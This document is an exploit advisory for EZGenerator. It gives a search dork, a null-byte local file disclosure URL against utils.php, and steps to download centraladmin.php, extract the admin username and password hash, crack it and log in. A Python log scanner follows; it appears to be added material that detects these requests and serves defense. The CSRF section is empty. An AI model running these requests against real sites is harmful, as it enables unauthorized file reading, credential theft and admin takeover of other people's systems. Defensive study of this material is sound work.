EZGenerator – Local File Disclosure/Admin Data/CSRF Vulnerability
=================================================================

####################################################################
.:. Author  : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home    : http://www.iphobos.com/blog/
.:. Dork    : inurl:"utils.php?action= inurl:"centraladmin.php?process="
(gR34‡$ T0 mY L0V3)
####################################################################

===[ Exploit ]===

Local File Disclosure:
=====================
www.site.com/utils.php?action=download&filename=file.php%00

Admin Data
===========
1- Download centraladmin.php via the file disclosure exploit
   [www.site.com/utils.php?action=download&filename=centraladmin.php%00]
2- The downloaded file contains:
   $ca_admin_username="admin";
   $ca_admin_pwd="c89f9f4ef264e22001f9a9c3d72992ef";
3- Crack hash and join
4- Admin panel: www.site.com/centraladmin.php

CSRF [Add Admin]:
================
####################################################################
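
A log check for the file disclosure request shown above (utils.php?action=download with a %00-terminated filename), as an added example that is not part of the original advisory. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = '''\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /utils.php?action=download&filename=centraladmin.php%00 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2024:10:00:09 +0000] "GET /utils.php?action=download&filename=..%252f..%252fconfig.php%2500 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2024:10:01:30 +0000] "GET /utils.php?action=download&filename=brochure.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2024:10:02:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def reasons_for(url):
    """Reasons a utils.php?action=download request looks like file disclosure."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/utils.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("action", [""])[0].lower() != "download":
        return []
    name = fully_decode(params.get("filename", [""])[0])
    reasons = []
    if "\x00" in name:
        reasons.append("null byte")
    if ".." in name or "/" in name or "\\" in name:
        reasons.append("path traversal")
    # Text before the first NUL is what a truncating file API would open.
    if name.split("\x00")[0].lower().endswith(".php"):
        reasons.append("php source requested")
    return reasons

def scan(log_text):
    """Return (client_ip, url, status, reasons) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and reasons_for(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3)), reasons_for(m.group(2))))
    return hits
```

A flagged request answered with status 200 deserves priority in triage, since it suggests the file was actually served and any credentials in it should be rotated.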